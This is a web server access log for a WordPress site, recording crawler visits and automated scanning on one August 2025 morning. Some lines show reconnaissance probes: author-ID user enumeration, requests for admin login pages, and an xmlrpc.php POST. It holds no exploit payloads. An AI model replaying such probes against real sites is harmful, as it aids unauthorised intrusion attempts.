111.229.111.163 - - [11/Aug/2025:11:43:21 +0800] "GET /author/admin/ HTTP/1.1" 200 19170 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
111.229.111.163 - - [11/Aug/2025:11:43:21 +0800] "GET /index.php?author=2 HTTP/1.1" 301 5 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
111.229.111.163 - - [11/Aug/2025:11:43:22 +0800] "GET /?author=2 HTTP/1.1" 404 9423 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
111.229.111.163 - - [11/Aug/2025:11:43:22 +0800] "GET /index.php?author=3 HTTP/1.1" 301 5 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0"
111.229.111.163 - - [11/Aug/2025:11:43:23 +0800] "GET /?author=3 HTTP/1.1" 404 9423 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0"
192.36.207.10 - - [11/Aug/2025:11:47:46 +0800] "GET /robots.txt HTTP/1.1" 200 119 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123"
192.36.121.172 - - [11/Aug/2025:11:47:48 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123"
170.106.72.93 - - [11/Aug/2025:11:57:46 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
170.106.72.93 - - [11/Aug/2025:11:57:48 +0800] "GET / HTTP/1.1" 200 33397 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
143.244.135.68 - - [11/Aug/2025:12:06:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
149.50.96.5 - - [11/Aug/2025:12:15:26 +0800] "GET /admin/login.asp HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
1.192.18.4 - - [11/Aug/2025:12:17:05 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
1.192.18.4 - - [11/Aug/2025:12:17:16 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/86.0.4240.111Safari/537.36"
1.192.18.4 - - [11/Aug/2025:12:17:16 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/86.0.4240.111Safari/537.36"
104.234.115.42 - - [11/Aug/2025:12:18:38 +0800] "GET / HTTP/1.0" 301 0 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
104.234.115.42 - - [11/Aug/2025:12:19:17 +0800] "GET / HTTP/1.1" 301 5 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
104.234.115.42 - - [11/Aug/2025:12:19:38 +0800] "GET /manage/account/login HTTP/1.1" 404 9423 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
104.234.115.42 - - [11/Aug/2025:12:19:55 +0800] "GET /admin/index.html HTTP/1.1" 404 9424 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
104.234.115.42 - - [11/Aug/2025:12:20:19 +0800] "GET /index.html HTTP/1.1" 200 8721 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
172.236.228.39 - - [11/Aug/2025:12:23:17 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
172.236.228.39 - - [11/Aug/2025:12:23:19 +0800] "GET / HTTP/1.1" 200 33397 "http://36.133.115.36/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
34.81.112.129 - - [11/Aug/2025:12:24:48 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
147.185.133.63 - - [11/Aug/2025:12:25:16 +0800] "GET / HTTP/1.1" 200 33397 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
193.34.212.110 - - [11/Aug/2025:12:30:35 +0800] "GET / HTTP/1.1" 200 33398 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [11/Aug/2025:12:39:04 +0800] "POST /wp-cron.php?doing_wp_cron=1754887144.4706931114196777343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
